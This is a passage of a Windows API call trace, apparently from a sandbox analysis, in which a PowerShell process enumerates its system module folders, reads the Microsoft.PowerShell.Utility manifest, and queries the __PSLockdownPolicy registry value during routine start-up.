lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdesiredstateconfiguration"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24bdbd40, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24ce66e0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24ce66e0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.146] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 
[0089.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x41, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", lpFilePart=0x0) returned 0x40 [0089.147] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.147] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdiagnostics"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x24bdbd40, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24bdbd40, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.147] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x42 [0089.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x42, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", lpFilePart=0x0) returned 0x41 [0089.147] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.147] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psscheduledjob"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, 
ftCreationTime.dwLowDateTime=0x24bb5be0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24bb5be0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24bb5be0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.147] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0089.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow", nBufferLength=0x3e, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow", lpFilePart=0x0) returned 0x3d [0089.148] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.148] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psworkflow"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b8fa80, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b8fa80, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b8fa80, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.148] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x45 [0089.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility", 
nBufferLength=0x45, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility", lpFilePart=0x0) returned 0x44 [0089.148] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.148] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psworkflowutility"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b437c0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b437c0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b437c0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x47 [0089.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", nBufferLength=0x47, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", lpFilePart=0x0) returned 0x46 [0089.150] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.150] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\troubleshootingpack"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, 
ftLastAccessTime.dwLowDateTime=0x919bae56, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x919bae56, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.150] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebee0c) returned 1 [0089.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0089.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x50, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0089.151] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\*", lpFindFileData=0x4ebebbc | out: lpFindFileData=0x4ebebbc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24bb5be0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24bb5be0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24bb5be0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x34d440 [0089.151] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24bb5be0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24bb5be0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24bb5be0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", 
cAlternateFileName="")) returned 1 [0089.151] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7a09930, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xd7a09930, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x2f20f74b, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x982, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psd1", cAlternateFileName="")) returned 1 [0089.151] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6d3e2f0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xd6d3e2f0, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x7778, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 1 [0089.151] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6d3e2f0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xd6d3e2f0, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x7778, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 0 [0089.151] FindClose (in: hFindFile=0x34d440 | out: hFindFile=0x34d440) returned 1 [0089.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb7c) returned 1 [0089.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeddc) returned 1 [0089.151] GetFileAttributesW 
(lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0089.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0089.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0089.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0089.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0089.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb84) returned 1 [0089.152] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), 
fInfoLevelId=0x0, lpFileInformation=0x67f22dc | out: lpFileInformation=0x67f22dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7a09930, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xd7a09930, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x2f20f74b, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x982)) returned 1 [0089.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb80) returned 1 [0089.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0089.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0089.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebecec) returned 1 [0089.153] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x468 [0089.153] GetFileType (hFile=0x468) returned 0x1 [0089.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebece8) returned 1 [0089.153] GetFileType (hFile=0x468) returned 0x1 [0089.153] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebed28*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x4ebed28*=0) returned 0x0 [0089.153] ReadFile (in: hFile=0x468, lpBuffer=0x67f30ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebed54, lpOverlapped=0x0 | out: lpBuffer=0x67f30ec*, lpNumberOfBytesRead=0x4ebed54*=0x982, lpOverlapped=0x0) returned 1 [0089.155] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebed28*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebed28*=0) returned 0x982 [0089.155] ReadFile (in: hFile=0x468, lpBuffer=0x67f260e, nNumberOfBytesToRead=0x27e, lpNumberOfBytesRead=0x4ebed54, lpOverlapped=0x0 | out: lpBuffer=0x67f260e*, lpNumberOfBytesRead=0x4ebed54*=0x0, lpOverlapped=0x0) returned 1 [0089.155] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebed28*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebed28*=0) returned 0x982 [0089.155] ReadFile (in: hFile=0x468, lpBuffer=0x67f30ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebed54, lpOverlapped=0x0 | out: lpBuffer=0x67f30ec*, lpNumberOfBytesRead=0x4ebed54*=0x0, lpOverlapped=0x0) returned 1 [0089.155] CloseHandle (hObject=0x468) returned 1 [0089.157] CoCreateGuid (in: pguid=0x4ebee54 | out: pguid=0x4ebee54*(Data1=0xf7a620fb, Data2=0x2f2d, Data3=0x48c3, Data4=([0]=0x8e, [1]=0xd4, [2]=0x5f, [3]=0xbf, [4]=0x86, [5]=0xeb, [6]=0xce, [7]=0x8e))) returned 0x0 [0089.157] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x468 [0089.157] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x4f0 [0089.158] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4f4 [0089.158] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4f8 [0089.158] SetEvent (hEvent=0x4f8) returned 1 [0089.158] SetEvent (hEvent=0x468) returned 1 [0089.158] SetEvent (hEvent=0x4f0) returned 1 [0089.158] SetEvent (hEvent=0x4f4) returned 1 [0089.158] CreateEventW 
(lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4fc [0089.159] SetThreadUILanguage (LangId=0x0) returned 0x409 [0089.210] EtwEventActivityIdControl () returned 0x0 [0089.210] EtwEventActivityIdControl () returned 0x0 [0089.210] EtwEventActivityIdControl () returned 0x0 [0089.224] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0089.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0089.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0089.225] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe680) returned 1 [0089.225] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe944 | out: lpFileInformation=0x4ebe944*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7a09930, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xd7a09930, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x2f20f74b, 
ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x982)) returned 1 [0089.225] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe67c) returned 1 [0089.225] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0089.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0089.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0089.225] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x4ebe588, Length=0x20, ResultLength=0x4ebe5f8 | out: SystemInformation=0x4ebe588, ResultLength=0x4ebe5f8*=0x0) returned 0xc0000003 [0089.226] GetSystemInfo (in: lpSystemInfo=0x4ebe604 | out: lpSystemInfo=0x4ebe604*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0089.226] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebe594 | out: phkResult=0x4ebe594*=0x500) returned 0x0 [0089.226] 
RegQueryValueExW (in: hKey=0x500, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x4ebe5b0, lpData=0x0, lpcbData=0x4ebe5ac*=0x0 | out: lpType=0x4ebe5b0*=0x0, lpData=0x0, lpcbData=0x4ebe5ac*=0x0) returned 0x2 [0089.226] RegCloseKey (hKey=0x500) returned 0x0 [0089.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0089.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0089.226] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe50c) returned 1 [0089.227] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x500 [0089.227] GetFileType (hFile=0x500) returned 0x1 [0089.227] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe508) returned 1 [0089.227] GetFileType (hFile=0x500) returned 0x1 [0089.227] SetFilePointer (in: hFile=0x500, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebe548*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebe548*=0) returned 0x0 [0089.227] ReadFile (in: hFile=0x500, lpBuffer=0x6826be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebe574, lpOverlapped=0x0 | out: lpBuffer=0x6826be8*, 
lpNumberOfBytesRead=0x4ebe574*=0x982, lpOverlapped=0x0) returned 1 [0089.227] SetFilePointer (in: hFile=0x500, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebe548*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebe548*=0) returned 0x982 [0089.228] ReadFile (in: hFile=0x500, lpBuffer=0x68260fe, nNumberOfBytesToRead=0x27e, lpNumberOfBytesRead=0x4ebe574, lpOverlapped=0x0 | out: lpBuffer=0x68260fe*, lpNumberOfBytesRead=0x4ebe574*=0x0, lpOverlapped=0x0) returned 1 [0089.228] SetFilePointer (in: hFile=0x500, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebe548*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebe548*=0) returned 0x982 [0089.228] ReadFile (in: hFile=0x500, lpBuffer=0x6826be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebe574, lpOverlapped=0x0 | out: lpBuffer=0x6826be8*, lpNumberOfBytesRead=0x4ebe574*=0x0, lpOverlapped=0x0) returned 1 [0089.228] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x4ebe4dc, Length=0x20, ResultLength=0x4ebe54c | out: SystemInformation=0x4ebe4dc, ResultLength=0x4ebe54c*=0x0) returned 0xc0000003 [0089.228] GetSystemInfo (in: lpSystemInfo=0x4ebe558 | out: lpSystemInfo=0x4ebe558*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0089.230] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebe4e8 | out: phkResult=0x4ebe4e8*=0x504) returned 0x0 [0089.230] RegQueryValueExW (in: hKey=0x504, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x4ebe504, lpData=0x0, lpcbData=0x4ebe500*=0x0 | out: lpType=0x4ebe504*=0x0, lpData=0x0, lpcbData=0x4ebe500*=0x0) returned 0x2 [0089.230] RegCloseKey (hKey=0x504) returned 0x0 [0089.230] 
